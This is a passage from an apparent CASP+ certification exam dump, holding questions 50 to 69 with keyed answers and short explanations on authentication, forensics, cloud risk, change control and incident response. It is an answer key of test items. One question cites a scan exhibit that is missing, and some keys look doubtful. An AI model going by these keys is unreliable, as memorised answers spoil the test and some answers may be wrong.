A</p><p>Explanation:</p><p>While the company has implemented Single Sign-On (SSO) with strong passwords, additional security controls are required to mitigate attacks such as LDAP injections, brute-force, whaling, and spear-phishing. 
Two-factor authentication (2FA) provides an additional layer of security by requiring users to provide two different forms of authentication (e.g., a password and a security token or a biometric factor), reducing the likelihood of unauthorized access even if passwords are compromised. CASP+ emphasizes the importance of using multi-factor authentication mechanisms to strengthen access control and protect against such attacks.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 2.0 - Enterprise Security Operations (Access Control and Multi-factor Authentication)</p><p>CompTIA CASP+ Study Guide: Implementing Two-Factor Authentication for System Access</p><p>50. Which of the following is a benefit of using steganalysis techniques in forensic response?</p><p>A. Breaking a symmetric cipher used in secure voice communications</p><p>B. Determining the frequency of unique attacks against DRM-protected media</p><p>C. Maintaining chain of custody for acquired evidence</p><p>D. Identifying least significant bit encoding of data in a .wav file</p><p>Answer: D</p><p>Explanation:</p><p>Steganalysis is the process of detecting hidden data in files or media, such as images, audio, or video. One technique of steganalysis is to identify least significant bit encoding, which is a method of hiding data by altering the least significant bits of each byte in a file. For example, a .wav file could contain hidden data encoded in the least significant bits of each audio sample. Steganalysis techniques can help forensic responders to discover hidden evidence or malicious payloads. Breaking a symmetric cipher, determining the frequency of attacks, or maintaining chain of custody are not related to steganalysis.</p><p>Verified Reference: https://www.comptia.org/blog/what-is-steganography</p><p>https://partners.comptia.org/docs/default-source/resources/casp-content-guide</p><p>51. 
Which of the following is the MOST important cloud-specific risk from the CSP’s viewpoint?</p><p>A. Isolation control failure</p><p>B. Management plane breach</p><p>C. Insecure data deletion</p><p>D. Resource exhaustion</p><p>Answer: B</p><p>52. A client is adding scope to a project.</p><p>Which of the following processes should be used when requesting updates or corrections to the client's systems?</p><p>A. The implementation engineer requests direct approval from the systems engineer and the Chief Information Security Officer.</p><p>B. The change control board must review and approve a submission.</p><p>C. The information system security officer provides the systems engineer with the system updates.</p><p>D. The security engineer asks the project manager to review the updates for the client's system.</p><p>Answer: B</p><p>Explanation:</p><p>The change control board (CCB) is a committee that consists of subject matter experts and managers who decide whether to implement proposed changes to a project. The change control board is part of the change management plan, which defines the roles and processes for managing change within a team or organization. The change control board must review and approve a submission for any change request that affects the scope, schedule, budget, quality, or risks of the project. The change control board evaluates the impact and benefits of the change request and decides whether to accept, reject, or defer it.</p><p>A. The implementation engineer requesting direct approval from the systems engineer and the Chief Information Security Officer is not a correct process for requesting updates or corrections to the client’s systems, because it bypasses the change control board and the project manager. This could lead to unauthorized changes that could compromise the project’s objectives and deliverables.</p><p>C. 
The information system security officer providing the systems engineer with the system updates is not a correct process for requesting updates or corrections to the client’s systems, because it does not involve the change control board or the project manager. This could lead to unauthorized changes that could introduce security vulnerabilities or conflicts with other system components.</p><p>D. The security engineer asking the project manager to review the updates for the client’s system is not a correct process for requesting updates or corrections to the client’s systems, because it does not involve the change control board. The project manager is responsible for facilitating the change management process, but not for approving or rejecting change requests.</p><p>https://www.projectmanager.com/blog/change-control-board-roles-responsibilities-processes</p><p>53. Two companies that recently merged would like to unify application access between the companies, without initially merging internal authentication stores.</p><p>Which of the following technical strategies would best meet this objective?</p><p>A. Federation</p><p>B. RADIUS</p><p>C. TACACS+</p><p>D. MFA</p><p>E. ABAC</p><p>Answer: A</p><p>Explanation:</p><p>Federation is the best strategy for unifying application access between two companies without merging their internal authentication stores. Federation allows users from different organizations to authenticate and access resources using their existing credentials through trusted third-party identity providers. This enables seamless access without the need to merge or consolidate internal authentication systems. 
CASP+ emphasizes federation as a key technology for enabling cross-organizational authentication while maintaining the integrity of separate identity stores.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 2.0 - Enterprise Security Operations (Federated Identity and Authentication)</p><p>CompTIA CASP+ Study Guide: Federated Identity Management for Mergers and Cross-Company Access</p><p>54. An architectural firm is working with its security team to ensure that any draft images that are leaked to the public can be traced back to a specific external party.</p><p>Which of the following would BEST accomplish this goal?</p><p>A. Properly configure a secure file transfer system to ensure file integrity.</p><p>B. Have the external parties sign non-disclosure agreements before sending any images.</p><p>C. Only share images with external parties that have worked with the firm previously.</p><p>D. Utilize watermarks in the images that are specific to each external party.</p><p>Answer: D</p><p>Explanation:</p><p>Watermarking is a technique of adding an identifying image or pattern to an original image to protect its ownership and authenticity. Watermarks can be customized to include specific information about the external party, such as their name, logo, or date of receipt. This way, if any draft images are leaked to the public, the firm can trace back the source of the leak and take appropriate actions.</p><p>Verified Reference:</p><p>https://en.wikipedia.org/wiki/Watermark</p><p>https://www.canva.com/features/watermark-photos/</p><p>https://www.mdpi.com/2078-2489/11/2/110</p><p>55. An organization does not have visibility into when company-owned assets are off network or not connected via a VPN. 
The lack of visibility prevents the organization from meeting security and operational objectives.</p><p>Which of the following cloud-hosted solutions should the organization implement to help mitigate the risk?</p><p>A. Antivirus</p><p>B. UEBA</p><p>C. EDR</p><p>D. HIDS</p><p>Answer: C</p><p>Explanation:</p><p>Endpoint Detection and Response (EDR) solutions provide continuous monitoring and response to advanced threats. They can help mitigate the risk of not having visibility into off-network activities by detecting, investigating, and responding to suspicious activities on endpoints, regardless of their location.</p><p>56. Which of the following best describes what happens if chain of custody is broken?</p><p>A. Tracking record details are not properly labeled.</p><p>B. Vital evidence could be deemed inadmissible.</p><p>C. Evidence is not exhibited in the court of law.</p><p>D. Evidence will need to be recollected.</p><p>Answer: B</p><p>Explanation:</p><p>Chain of custody is critical in legal contexts as it documents the seizure, custody, control, transfer, analysis, and disposition of evidence. If the chain of custody is broken, it means there is a possibility that the evidence could have been tampered with or compromised, which can lead to it being deemed inadmissible in court.</p><p>57. An organization has an operational requirement with a specific equipment vendor. The organization is located in the United States, but the vendor is located in another region.</p><p>Which of the following risks would be most concerning to the organization in the event of equipment failure?</p><p>A. Support may not be available during all business hours.</p><p>B. The organization requires authorized vendor specialists.</p><p>C. Each region has different regulatory frameworks to follow.</p><p>D. 
Shipping delays could cost the organization money.</p><p>Answer: A</p><p>Explanation:</p><p>The primary risk for an organization working with vendors in different time zones is that support might not be available during the organization's regular business hours. This can lead to delays in receiving necessary support or assistance when equipment issues arise, which could be critical if there's an equipment failure.</p><p>58. Due to internal resource constraints, the management team has asked the principal security architect to recommend a solution that shifts most of the responsibility for application-level controls to the cloud provider.</p><p>In the shared responsibility model, which of the following levels of service meets this requirement?</p><p>A. IaaS</p><p>B. SaaS</p><p>C. FaaS</p><p>D. PaaS</p><p>Answer: B</p><p>59. An organization that provides a SaaS solution recently experienced an incident involving customer data loss. The system has a level of self-healing that includes monitoring performance and available resources. When the system detects an issue, the self-healing process is supposed to restart parts of the software.</p><p>During the incident, when the self-healing system attempted to restart the services, available disk space on the data drive to restart all the services was inadequate. The self-healing system did not detect that some services did not fully restart and declared the system as fully operational.</p><p>Which of the following BEST describes the reason why the silent failure occurred?</p><p>A. The system logs rotated prematurely.</p><p>B. The disk utilization alarms are higher than what the service restarts require.</p><p>C. The number of nodes in the self-healing cluster was healthy.</p><p>D. Conditional checks prior to the service restart succeeded.</p><p>Answer: D</p><p>60. A software developer created an application for a large, multinational company. 
The company is concerned the program code could be reverse engineered by a foreign entity and intellectual property would be lost.</p><p>Which of the following techniques should be used to prevent this situation?</p><p>A. Obfuscation</p><p>B. Code signing</p><p>C. Watermarking</p><p>D. Digital certificates</p><p>Answer: A</p><p>Explanation:</p><p>Obfuscation is a technique used to make the program code difficult to understand or read. It can help to prevent reverse engineering by making it more challenging to analyze the code and understand its structure and functionality, thereby protecting intellectual property.</p><p>61. A threat hunting team receives a report about possible APT activity in the network.</p><p>Which of the following threat management frameworks should the team implement?</p><p>A. NIST SP 800-53</p><p>B. MITRE ATT&CK</p><p>C. The Cyber Kill Chain</p><p>D. The Diamond Model of Intrusion Analysis</p><p>Answer: B</p><p>Explanation:</p><p>MITRE ATT&CK is a threat management framework that provides a comprehensive and detailed knowledge base of adversary tactics and techniques based on real-world observations. It can help threat hunting teams to identify, understand, and prioritize potential threats, as well as to develop effective detection and response strategies. MITRE ATT&CK covers the entire lifecycle of a cyberattack, from initial access to impact, and provides information on how to mitigate, detect, and hunt for each technique. It also includes threat actor profiles, software descriptions, and data sources that can be used for threat intelligence and analysis.</p><p>Verified Reference:</p><p>https://attack.mitre.org/</p><p>https://resources.infosecinstitute.com/topic/top-threat-modeling-frameworks-stride-owasp-top-10-mitre-attck-framework/</p><p>https://www.ibm.com/topics/threat-management</p><p>62. 
A company is looking at sending historical backups containing customer PII to a cloud service provider to save on storage costs.</p><p>Which of the following is the MOST important consideration before making this decision?</p><p>A. Availability</p><p>B. Data sovereignty</p><p>C. Geography</p><p>D. Vendor lock-in</p><p>Answer: B</p><p>63. A Chief Information Security Officer (CISO) is developing corrective-action plans based on the following from a vulnerability scan of internal hosts:</p><p>Which of the following is the MOST appropriate corrective action to document for this finding?</p><p>A. The product owner should perform a business impact assessment regarding the ability to implement a WAF.</p><p>B. The application developer should use a static code analysis tool to ensure any application code is not vulnerable to buffer overflows.</p><p>C. The system administrator should evaluate dependencies and perform upgrades as necessary.</p><p>D. The security operations center should develop a custom IDS rule to prevent buffer overflow attacks against this server.</p><p>Answer: A</p><p>64. A junior security researcher has identified a buffer overflow vulnerability leading to remote code execution in a former employer's software. The security researcher asks for the manager's advice on the vulnerability submission process.</p><p>Which of the following is the best advice the current manager can provide the security researcher?</p><p>A. Collect proof that the exploit works in order to expedite the process.</p><p>B. Publish proof-of-concept exploit code on a personal blog.</p><p>C. Recommend legal consultation about the process.</p><p>D. Visit a bug bounty website for the latest information.</p><p>Answer: C</p><p>Explanation:</p><p>When a security researcher identifies a vulnerability, especially one involving remote code execution, they must navigate a process that protects them legally and ethically. 
The best advice here is to consult with legal professionals to understand any liabilities, such as potential violations of non-disclosure agreements (NDAs) or intellectual property concerns. Legal consultation ensures that the researcher follows responsible disclosure practices and avoids legal repercussions, which aligns with CASP+ guidance on managing vulnerabilities and the responsible handling of sensitive security information. CompTIA CASP+ emphasizes the importance of adhering to legal and regulatory frameworks when reporting vulnerabilities, especially when dealing with former employers or clients.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 1.0 - Risk Management (Responsible Disclosure, Legal Concerns)</p><p>CompTIA CASP+ Study Guide: Handling Vulnerabilities and Legal Considerations</p><p>65. A company wants to reduce its backup storage requirement and is undertaking a data cleanup project.</p><p>Which of the following should a security administrator consider first when determining which data should be deleted?</p><p>A. Retention schedules</p><p>B. Classification levels</p><p>C. Sanitization requirements</p><p>D. Data labels</p><p>E. File size</p><p>Answer: A</p><p>Explanation:</p><p>Before determining which data should be deleted during a data cleanup project, it is critical to first review retention schedules. Retention schedules specify how long data must be retained to comply with legal, regulatory, or business requirements. Deleting data prematurely could result in non-compliance or the loss of important information. By consulting retention schedules, the security administrator ensures that data is deleted in a compliant and controlled manner, based on its retention policy. 
CASP+ highlights data retention management as a key element in data governance and security.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 1.0 - Risk Management (Data Governance and Retention Policies)</p><p>CompTIA CASP+ Study Guide: Data Retention, Deletion, and Compliance Requirements</p><p>66. A company wants to improve its active protection capabilities against unknown and zero-day malware.</p><p>Which of the following is the MOST secure solution?</p><p>A. NIDS</p><p>B. Application allow list</p><p>C. Sandbox detonation</p><p>D. Endpoint log collection</p><p>E. HIDS</p><p>Answer: C</p><p>67. A financial institution has several servers that currently employ the following controls:</p><p>* The servers follow a monthly patching cycle.</p><p>* All changes must go through a change management process.</p><p>* Developers and systems administrators must log into a jumpbox to access the servers hosting the data using two-factor authentication.</p><p>* The servers are on an isolated VLAN and cannot be directly accessed from the internal production network.</p><p>An outage recently occurred and lasted several days due to an upgrade that circumvented the approval process. Once the security team discovered an unauthorized patch was installed, they were able to resume operations within an hour.</p><p>Which of the following should the security administrator recommend to reduce the time to resolution if a similar incident occurs in the future?</p><p>A. Require more than one approver for all change management requests.</p><p>B. Implement file integrity monitoring with automated alerts on the servers.</p><p>C. Disable automatic patch update capabilities on the servers.</p><p>D. Enhance audit logging on the jump servers and ship the logs to the SIEM.</p><p>Answer: B</p><p>68. A company hosts a large amount of data in blob storage for its customers. 
The company recently had a number of issues with this data being prematurely deleted before the scheduled backup processes could be completed. The management team has asked the security architect for a recommendation that allows blobs to be deleted occasionally, but only after a successful backup.</p><p>Which of the following solutions will BEST meet this requirement?</p><p>A. Mirror the blobs at a local data center.</p><p>B. Enable fast recovery on the storage account.</p><p>C. Implement soft delete for blobs.</p><p>D. Make the blob immutable.</p><p>Answer: C</p><p>Explanation:</p><p>Soft delete allows blobs to be deleted, but the data remains accessible for a period of time before it is permanently deleted. This allows the company to delete blobs as needed, while still affording enough time for the backup process to complete. After the backup process is complete, the blobs can be permanently deleted.</p><p>69. A security analyst for a managed service provider wants to implement the most up-to-date and effective security methodologies to provide clients with the best offerings.</p><p>Which of the following resources would the analyst MOST likely adopt?</p><p>A. OSINT</p><p>B. ISO</p><p>C. MITRE ATT&CK</p><p>D. OWASP</p><p>Answer: C</p><p>Explanation:</p><p>MITRE ATT&CK is a threat management framework that provides a comprehensive and detailed knowledge base of adversary tactics and techniques based on real-world observations. It can help security</p>